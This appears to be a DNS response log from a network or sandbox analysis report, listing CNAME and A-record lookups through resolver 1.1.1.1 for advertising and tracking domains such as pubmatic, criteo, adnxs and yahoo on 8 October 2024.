                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.309037924 CEST1.1.1.1192.168.2.40x3aedNo error (0)ow.pubmatic.comowv2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.309037924 CEST1.1.1.1192.168.2.40x3aedNo error (0)owv2.pubmnet.comow-lhrc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.454113960 CEST1.1.1.1192.168.2.40x35aNo error (0)hbx.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.460628033 CEST1.1.1.1192.168.2.40x936aNo error (0)ups.analytics.yahoo.comdcs-ups.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.460628033 CEST1.1.1.1192.168.2.40x936aNo error (0)dcs-ups.g03.yahoodns.netprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.460628033 CEST1.1.1.1192.168.2.40x936aNo error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.460628033 CEST1.1.1.1192.168.2.40x936aNo error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.460628033 CEST1.1.1.1192.168.2.40x936aNo error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.75.62.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.460628033 CEST1.1.1.1192.168.2.40x936aNo error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.71.149.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.461384058 CEST1.1.1.1192.168.2.40x1ec3No error (0)ups.analytics.yahoo.comdcs-ups.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.461384058 CEST1.1.1.1192.168.2.40x1ec3No error (0)dcs-ups.g03.yahoodns.netprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.461384058 CEST1.1.1.1192.168.2.40x1ec3No error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.461384058 CEST1.1.1.1192.168.2.40x1ec3No error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.653103113 CEST1.1.1.1192.168.2.40xbc5eNo error (0)www.yahoo.comme-ycpi-cf-www.g06.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.653103113 CEST1.1.1.1192.168.2.40xbc5eNo error (0)me-ycpi-cf-www.g06.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.653103113 CEST1.1.1.1192.168.2.40xbc5eNo error (0)me-ycpi-cf-www.g06.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.890192986 CEST1.1.1.1192.168.2.40xb305No error (0)www.yahoo.comme-ycpi-cf-www.g06.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.120013952 CEST1.1.1.1192.168.2.40xfab9No error (0)id.rlcdn.com35.244.174.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.135699034 CEST1.1.1.1192.168.2.40x2bb1No error (0)dis.criteo.comwidget.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.135699034 CEST1.1.1.1192.168.2.40x2bb1No error (0)widget.nl3.vip.prod.criteo.com178.250.1.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.136042118 CEST1.1.1.1192.168.2.40x9582No error (0)dis.criteo.comwidget.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.206196070 CEST1.1.1.1192.168.2.40xa93dNo error (0)us-u.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.206196070 CEST1.1.1.1192.168.2.40xa93dNo error (0)us-u.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.211975098 CEST1.1.1.1192.168.2.40x4cc0No error (0)s.amazon-adsystem.com98.82.156.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.221693993 CEST1.1.1.1192.168.2.40x5dd8No error (0)contextual.media.net88.221.168.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.225814104 CEST1.1.1.1192.168.2.40xd485No error (0)cs.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.231451988 CEST1.1.1.1192.168.2.40x984fNo error (0)id.a-mx.com121.127.42.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.231451988 CEST1.1.1.1192.168.2.40x984fNo error (0)id.a-mx.com138.199.41.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.243882895 CEST1.1.1.1192.168.2.40xd078No error (0)rtb.mfadsrvr.compool.dorpat.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.243882895 CEST1.1.1.1192.168.2.40xd078No error (0)pool.dorpat.iponweb.netdorpat.geo.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.244425058 CEST1.1.1.1192.168.2.40x97d1No error (0)rtb.mfadsrvr.compool.dorpat.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.244425058 CEST1.1.1.1192.168.2.40x97d1No error (0)pool.dorpat.iponweb.netdorpat.geo.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.244425058 CEST1.1.1.1192.168.2.40x97d1No error (0)dorpat.geo.iponweb.net35.214.199.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.288639069 CEST1.1.1.1192.168.2.40xac5aNo error (0)pixel.tapad.com34.111.113.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.298914909 CEST1.1.1.1192.168.2.40xfbaNo error (0)aax-eu.amazon-adsystem.com52.95.115.255A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.410310984 CEST1.1.1.1192.168.2.40xe738No error (0)geo.yahoo.comgeo-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.410310984 CEST1.1.1.1192.168.2.40xe738No error (0)geo-atsv2.media.g03.yahoodns.net188.125.72.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.411427975 CEST1.1.1.1192.168.2.40x7a67No error (0)geo.yahoo.comgeo-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.436263084 CEST1.1.1.1192.168.2.40xf54dNo error (0)ow.pubmatic.comowv2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.436263084 CEST1.1.1.1192.168.2.40xf54dNo error (0)owv2.pubmnet.comow-amsc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.436263084 CEST1.1.1.1192.168.2.40xf54dNo error (0)ow-amsc.pubmnet.com185.64.189.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.436986923 CEST1.1.1.1192.168.2.40x22abNo error (0)ow.pubmatic.comowv2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.436986923 CEST1.1.1.1192.168.2.40x22abNo error (0)owv2.pubmnet.comow-amsc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.470865965 CEST1.1.1.1192.168.2.40xd1e2No error (0)c21lg-d.media.netstar.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.472563982 CEST1.1.1.1192.168.2.40xa035No error (0)c21lg-d.media.netstar.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.568552017 CEST1.1.1.1192.168.2.40x2a45No error (0)crb.kargo.com18.193.235.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.568552017 CEST1.1.1.1192.168.2.40x2a45No error (0)crb.kargo.com18.158.122.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.568552017 CEST1.1.1.1192.168.2.40x2a45No error (0)crb.kargo.com18.196.164.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.582670927 CEST1.1.1.1192.168.2.40x1806No error (0)prebid.adnxs.comxandr-prebid.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.621253014 CEST1.1.1.1192.168.2.40xe58cNo error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.621758938 CEST1.1.1.1192.168.2.40x70eaNo error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.895886898 CEST1.1.1.1192.168.2.40xcd39No error (0)ce.lijit.comce-ew1.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.895886898 CEST1.1.1.1192.168.2.40xcd39No error (0)ce-ew1.lijit.comraptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.895886898 CEST1.1.1.1192.168.2.40xcd39No error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com63.34.192.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.895886898 CEST1.1.1.1192.168.2.40xcd39No error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com52.208.94.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.895886898 CEST1.1.1.1192.168.2.40xcd39No error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com54.76.119.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.895886898 CEST1.1.1.1192.168.2.40xcd39No error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com63.35.119.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.895886898 CEST1.1.1.1192.168.2.40xcd39No error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com176.34.149.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.895886898 CEST1.1.1.1192.168.2.40xcd39No error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com52.208.207.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.895886898 CEST1.1.1.1192.168.2.40xcd39No error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com52.49.216.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.895886898 CEST1.1.1.1192.168.2.40xcd39No error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com52.48.221.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.896022081 CEST1.1.1.1192.168.2.40x4898No error (0)ce.lijit.comce-ew1.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:33.896022081 CEST1.1.1.1192.168.2.40x4898No error (0)ce-ew1.lijit.comraptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.446405888 CEST1.1.1.1192.168.2.40x2191No error (0)sync.targeting.unrulymedia.comsync.1rx.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.446405888 CEST1.1.1.1192.168.2.40x2191No error (0)sync.1rx.io46.228.174.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.447391987 CEST1.1.1.1192.168.2.40x81c6No error (0)sync.targeting.unrulymedia.comsync.1rx.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.467878103 CEST1.1.1.1192.168.2.40x4df4No error (0)pippio.com107.178.254.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.493947029 CEST1.1.1.1192.168.2.40x3c0dNo error (0)capi.connatix.comcapi.connatix.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.494102001 CEST1.1.1.1192.168.2.40x8c0dNo error (0)image4.pubmatic.comimage4-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.494102001 CEST1.1.1.1192.168.2.40x8c0dNo error (0)image4-v2.pubmnet.comspug-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.494102001 CEST1.1.1.1192.168.2.40x8c0dNo error (0)spug-amsfpairbc.pubmnet.com198.47.127.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.494615078 CEST1.1.1.1192.168.2.40x7fa6No error (0)image4.pubmatic.comimage4-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.494615078 CEST1.1.1.1192.168.2.40x7fa6No error (0)image4-v2.pubmnet.comspug-lhrc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.494811058 CEST1.1.1.1192.168.2.40xec47No error (0)capi.connatix.comcapi.connatix.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.527116060 CEST1.1.1.1192.168.2.40x9d67No error (0)aax-eu.amazon-adsystem.com52.95.115.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.615426064 CEST1.1.1.1192.168.2.40x1ea5No error (0)c21lg-d.media.netstar.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:34.617803097 CEST1.1.1.1192.168.2.40x6aaNo error (0)c21lg-d.media.netstar.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.137141943 CEST1.1.1.1192.168.2.40x15c8No error (0)crb.kargo.com18.196.164.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.137141943 CEST1.1.1.1192.168.2.40x15c8No error (0)crb.kargo.com18.158.122.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.137141943 CEST1.1.1.1192.168.2.40x15c8No error (0)crb.kargo.com18.193.235.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.186403990 CEST1.1.1.1192.168.2.40xeb2cNo error (0)live.primis.techd2wcz8sc48ztgm.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.186403990 CEST1.1.1.1192.168.2.40xeb2cNo error (0)d2wcz8sc48ztgm.cloudfront.net13.32.99.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.186403990 CEST1.1.1.1192.168.2.40xeb2cNo error (0)d2wcz8sc48ztgm.cloudfront.net13.32.99.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.186403990 CEST1.1.1.1192.168.2.40xeb2cNo error (0)d2wcz8sc48ztgm.cloudfront.net13.32.99.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.186403990 CEST1.1.1.1192.168.2.40xeb2cNo error (0)d2wcz8sc48ztgm.cloudfront.net13.32.99.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.187362909 CEST1.1.1.1192.168.2.40x2c14No error (0)live.primis.techd2wcz8sc48ztgm.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.246262074 CEST1.1.1.1192.168.2.40xf56dNo error (0)secure.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.246262074 CEST1.1.1.1192.168.2.40xf56dNo error (0)ib.anycast.adnxs.com185.89.210.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.246262074 CEST1.1.1.1192.168.2.40xf56dNo error (0)ib.anycast.adnxs.com185.89.210.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.246262074 CEST1.1.1.1192.168.2.40xf56dNo error (0)ib.anycast.adnxs.com185.89.211.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.246262074 CEST1.1.1.1192.168.2.40xf56dNo error (0)ib.anycast.adnxs.com185.89.210.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.246262074 CEST1.1.1.1192.168.2.40xf56dNo error (0)ib.anycast.adnxs.com185.89.210.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.246262074 CEST1.1.1.1192.168.2.40xf56dNo error (0)ib.anycast.adnxs.com185.89.211.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.246262074 CEST1.1.1.1192.168.2.40xf56dNo error (0)ib.anycast.adnxs.com185.89.210.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.246262074 CEST1.1.1.1192.168.2.40xf56dNo error (0)ib.anycast.adnxs.com185.89.210.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.246262074 CEST1.1.1.1192.168.2.40xf56dNo error (0)ib.anycast.adnxs.com185.89.210.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.246262074 CEST1.1.1.1192.168.2.40xf56dNo error (0)ib.anycast.adnxs.com185.89.210.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.246262074 CEST1.1.1.1192.168.2.40xf56dNo error (0)ib.anycast.adnxs.com185.89.210.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.246262074 CEST1.1.1.1192.168.2.40xf56dNo error (0)ib.anycast.adnxs.com185.89.210.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.269320011 CEST1.1.1.1192.168.2.40xb719No error (0)capi.connatix.comcapi.connatix.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.270143032 CEST1.1.1.1192.168.2.40x6b8cNo error (0)capi.connatix.comcapi.connatix.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.383126974 CEST1.1.1.1192.168.2.40xcd63No error (0)ce.lijit.comce-ew1.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.383126974 CEST1.1.1.1192.168.2.40xcd63No error (0)ce-ew1.lijit.comraptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.383126974 CEST1.1.1.1192.168.2.40xcd63No error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com63.34.192.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.383126974 CEST1.1.1.1192.168.2.40xcd63No error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com176.34.149.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.383126974 CEST1.1.1.1192.168.2.40xcd63No error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com52.208.94.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.383126974 CEST1.1.1.1192.168.2.40xcd63No error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com52.49.216.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.383126974 CEST1.1.1.1192.168.2.40xcd63No error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com52.48.221.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.383126974 CEST1.1.1.1192.168.2.40xcd63No error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com52.17.21.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.383126974 CEST1.1.1.1192.168.2.40xcd63No error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com54.76.119.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.383126974 CEST1.1.1.1192.168.2.40xcd63No error (0)raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.com54.229.15.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.384880066 CEST1.1.1.1192.168.2.40x32afNo error (0)ce.lijit.comce-ew1.lijit.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.384880066 CEST1.1.1.1192.168.2.40x32afNo error (0)ce-ew1.lijit.comraptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.685434103 CEST1.1.1.1192.168.2.40x3983No error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.685434103 CEST1.1.1.1192.168.2.40x3983No error (0)ib.anycast.adnxs.com37.252.172.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.685434103 CEST1.1.1.1192.168.2.40x3983No error (0)ib.anycast.adnxs.com37.252.171.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.685434103 CEST1.1.1.1192.168.2.40x3983No error (0)ib.anycast.adnxs.com37.252.171.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.685434103 CEST1.1.1.1192.168.2.40x3983No error (0)ib.anycast.adnxs.com37.252.171.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.685434103 CEST1.1.1.1192.168.2.40x3983No error (0)ib.anycast.adnxs.com37.252.171.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.685434103 CEST1.1.1.1192.168.2.40x3983No error (0)ib.anycast.adnxs.com37.252.173.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:35.685434103 CEST1.1.1.1192.168.2.40x3983No error (0)ib.anycast.adnxs.com37.252.171.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:36.038621902 CEST1.1.1.1192.168.2.40x4cabNo error (0)pb-am.a-mo.net163.5.194.37A (IP address)IN (0x0001)false
